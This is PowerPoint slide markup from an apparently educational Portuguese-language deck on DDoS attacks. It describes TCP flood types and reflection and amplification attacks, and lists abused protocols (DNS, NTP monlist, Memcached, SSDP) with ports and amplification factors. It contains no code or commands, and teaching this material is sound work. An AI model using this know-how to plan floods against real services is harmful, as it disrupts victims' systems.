        <p:spPr>
          <a:xfrm>
            <a:off x="5343525" y="5657850"/>
            <a:ext cx="15859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pacotes ACK não solicitados, forçando o servidor a verificar conexões inexistentes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77" name="Shape 59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7029450" y="5372100"/>
            <a:ext cx="1685925" cy="8001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78" name="Text 60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7115175" y="5457825"/>
            <a:ext cx="1585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FIN Flood</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79" name="Text 61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7115175" y="5657850"/>
            <a:ext cx="15859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Inunda com pacotes FIN para encerrar conexões que não existem</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80" name="Shape 62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5257800" y="6257925"/>
            <a:ext cx="1685925" cy="8001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1" name="Text 63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5343525" y="6343650"/>
            <a:ext cx="1585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PUSH+ACK</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82" name="Text 64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5343525" y="6543675"/>
            <a:ext cx="15859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Força o servidor a limpar buffers e enviar confirmações constantemente</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name="Shape 65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7029450" y="6257925"/>
            <a:ext cx="1685925" cy="800100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4" name="Text 66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7115175" y="6343650"/>
            <a:ext cx="1585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RST Flood</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="85" name="Text 67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7115175" y="6543675"/>
            <a:ext cx="15859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pacotes RST para interromper conexões legítimas</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86" name="Shape 68"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="748665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87" name="Text 69"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="285750" y="757237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88" name="Text 70"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8413412" y="757237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4/14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5295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Ataques: Amplificação/Reflexão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Multiplicando o poder de ataque através de servidores intermediários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4200525" cy="14859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14859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" name="Text 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="400050" y="1571625"/>
            <a:ext cx="4043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Como Funciona?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0050" y="1885950"/>
            <a:ext cx="4043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de amplificação/reflexão exploram servidores intermediários (refletores) para multiplicar o volume do tráfego direcionado à vítima.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00050" y="2314575"/>
            <a:ext cx="40433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 atacante envia requisições com IP de origem falsificado (spoofed) para o IP da vítima. O servidor refletor responde para o IP falsificado, gerando tráfego amplificado.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285750" y="3114675"/>
            <a:ext cx="4200525" cy="23145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00050" y="3228975"/>
            <a:ext cx="4043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de um Ataque de Amplificação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540274" y="3600450"/>
            <a:ext cx="342900" cy="342900"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="DC2626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86" y="3700463"/>
            <a:ext cx="142875" cy="1428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14350" y="3971925"/>
            <a:ext cx="4662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Atacante</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Shape 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1724016" y="3600450"/>
            <a:ext cx="342900" cy="342900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69" y="3700463"/>
            <a:ext cx="178594" cy="1428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750888" y="3971925"/>
            <a:ext cx="3605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Botnet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Shape 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2979613" y="3600450"/>
            <a:ext cx="342900" cy="3429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626" y="3700463"/>
            <a:ext cx="142875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923161" y="3971925"/>
            <a:ext cx="5272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Refletores</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Shape 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3914775" y="4686300"/>
            <a:ext cx="342900" cy="3429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47" y="4786313"/>
            <a:ext cx="107156" cy="1428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944494" y="5057775"/>
            <a:ext cx="35487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Vítima</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Shape 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="857250" y="3771900"/>
            <a:ext cx="457200" cy="14288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29" name="Text 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1200150" y="3714750"/>
            <a:ext cx="48599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8717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Comandos</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Shape 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1657350" y="3771900"/>
            <a:ext cx="914400" cy="14288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1" name="Text 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1885950" y="3666530"/>
            <a:ext cx="914958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Pequenas requisições</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Text 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1885950" y="3780830"/>
            <a:ext cx="49409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BBF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IP Spoofed</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Text 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2323672" y="4523780"/>
            <a:ext cx="976740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A78BF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Respostas amplificadas</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Text 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2323672" y="4638080"/>
            <a:ext cx="71789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A78BF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IP da vítima</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Shape 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1425764" y="4514850"/>
            <a:ext cx="1920497" cy="200025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36" name="Text 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1425764" y="4514850"/>
            <a:ext cx="1991934" cy="200025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 de Amplificação: 10x - 500x</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Text 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1425764" y="4743450"/>
            <a:ext cx="199193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Pequena requisição → Grande resposta</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Shape 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="285750" y="5600700"/>
            <a:ext cx="4200525" cy="131445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39" name="Shape 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="285750" y="5600700"/>
            <a:ext cx="28575" cy="131445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40" name="Text 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="400050" y="5715000"/>
            <a:ext cx="4043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Vantagens para o Atacante</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody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5972175"/>
            <a:ext cx="114300" cy="114300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571500" y="5943600"/>
            <a:ext cx="226322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Amplificação massiva do tráfego (até 500x)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900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6200775"/>
            <a:ext cx="114300" cy="114300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="Text 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="6172200"/>
            <a:ext cx="188868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Ocultação da origem real do ataque</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody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" y="6429375"/>
            <a:ext cx="114300" cy="11430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571500" y="6400800"/>
            <a:ext cx="222343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Uso de servidores legítimos como "armas"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody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" y="6657975"/>
            <a:ext cx="114300" cy="114300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="Text 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="6629400"/>
            <a:ext cx="271389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Difícil de filtrar (tráfego vem de servidores legítimos)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="Text 38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4657725" y="145732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Protocolos Comumente Abusados</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1125" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="Shape 39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4657725" y="1771650"/>
            <a:ext cx="2043113" cy="15001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51" name="Shape 40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4772025" y="1914525"/>
            <a:ext cx="228600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1996678"/>
            <a:ext cx="114300" cy="114300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="Text 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5057775" y="1885950"/>
            <a:ext cx="10641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DNS Amplification</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="Shape 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5057775" y="2093119"/>
            <a:ext cx="414477" cy="123230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55" name="Text 43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5057775" y="2093119"/>
            <a:ext cx="485915" cy="123230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UDP/53</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56" name="Text 44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4772025" y="228600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 servidores DNS abertos ou mal configurados. Envia consultas que geram respostas grandes.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="Text 45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4772025" y="2771775"/>
            <a:ext cx="91730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Requisição: ~60 bytes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5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5061" y="2786063"/>
            <a:ext cx="75009" cy="85725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="Text 46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5707242" y="2771775"/>
            <a:ext cx="95070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Resposta: ~4000 bytes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60" name="Shape 47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4772025" y="2943225"/>
            <a:ext cx="1814513" cy="200025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61" name="Text 48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4772025" y="2943225"/>
            <a:ext cx="1885950" cy="200025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~50-70x</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62" name="Shape 49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6815138" y="1771650"/>
            <a:ext cx="2043113" cy="15001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63" name="Shape 50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6929438" y="1914525"/>
            <a:ext cx="228600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6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588" y="1996678"/>
            <a:ext cx="114300" cy="114300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65" name="Text 51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7215188" y="1885950"/>
            <a:ext cx="1049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NTP Amplification</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="Shape 52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7215188" y="2093119"/>
            <a:ext cx="462139" cy="123230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67" name="Text 53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7215188" y="2093119"/>
            <a:ext cx="533577" cy="123230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UDP/123</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68" name="Text 54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6929438" y="228600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Abusa do comando monlist que retorna os últimos 600 clientes que se conectaram ao servidor NTP.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69" name="Text 55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6929438" y="2771775"/>
            <a:ext cx="91730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Requisição: ~60 bytes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7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2474" y="2786063"/>
            <a:ext cx="75009" cy="85725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71" name="Text 56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7864655" y="2771775"/>
            <a:ext cx="95070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Resposta: ~1000 bytes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72" name="Shape 57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6929438" y="2943225"/>
            <a:ext cx="1814513" cy="200025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73" name="Text 58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6929438" y="2943225"/>
            <a:ext cx="1885950" cy="200025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~20-200x</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74" name="Shape 59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4657725" y="3371850"/>
            <a:ext cx="2043113" cy="15001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5" name="Shape 60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4772025" y="3514725"/>
            <a:ext cx="242888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7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3596878"/>
            <a:ext cx="128588" cy="114300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77" name="Text 61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5072063" y="3486150"/>
            <a:ext cx="7257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Memcached</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78" name="Shape 62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5072063" y="3693319"/>
            <a:ext cx="548032" cy="123230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79" name="Text 63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5072063" y="3693319"/>
            <a:ext cx="619469" cy="123230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UDP/11211</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80" name="Text 64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4772025" y="388620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 servidores de cache em memória expostos à internet. Gera as maiores amplificações conhecidas.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81" name="Text 65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4772025" y="4371975"/>
            <a:ext cx="91730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Requisição: ~50 bytes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8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1039" y="4386263"/>
            <a:ext cx="75009" cy="85725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name="Text 66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5819198" y="4371975"/>
            <a:ext cx="83874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Resposta: ~100KB+</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84" name="Shape 67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4772025" y="4543425"/>
            <a:ext cx="1814513" cy="200025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85" name="Text 68"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4772025" y="4543425"/>
            <a:ext cx="1885950" cy="200025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~10.000-50.000x</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86" name="Shape 69"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6815138" y="3371850"/>
            <a:ext cx="2043113" cy="15001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87" name="Shape 70"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6929438" y="3514725"/>
            <a:ext cx="200025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8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6588" y="3596878"/>
            <a:ext cx="85725" cy="114300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89" name="Text 71"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7186613" y="3486150"/>
            <a:ext cx="5812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SSDP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90" name="Shape 72"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7186613" y="3693319"/>
            <a:ext cx="509829" cy="123230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91" name="Text 73"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7186613" y="3693319"/>
            <a:ext cx="581267" cy="123230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UDP/1900</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="92" name="Text 74"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6929438" y="388620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 o protocolo Simple Service Discovery Protocol usado por dispositivos UPnP.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="93" name="Text 75"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6929438" y="4371975"/>
            <a:ext cx="91730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Requisição: ~30 bytes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9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06305" y="4386263"/>
            <a:ext cx="75009" cy="85725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="95" name="Text 76"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7912317" y="4371975"/>
            <a:ext cx="90304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Resposta: ~500 bytes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="96" name="Shape 77"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6929438" y="4543425"/>
            <a:ext cx="1814513" cy="200025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="4C1D95">
              <a:alpha val="60000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="97" name="Text 78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6929438" y="4543425"/>
            <a:ext cx="1885950" cy="200025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~10-30x</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="98" name="Shape 79"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4657725" y="4972050"/>
            <a:ext cx="4200525" cy="90011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9" name="Text 80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4772025" y="5086350"/>
            <a:ext cx="4043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Outros Protocolos Vulneráveis</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
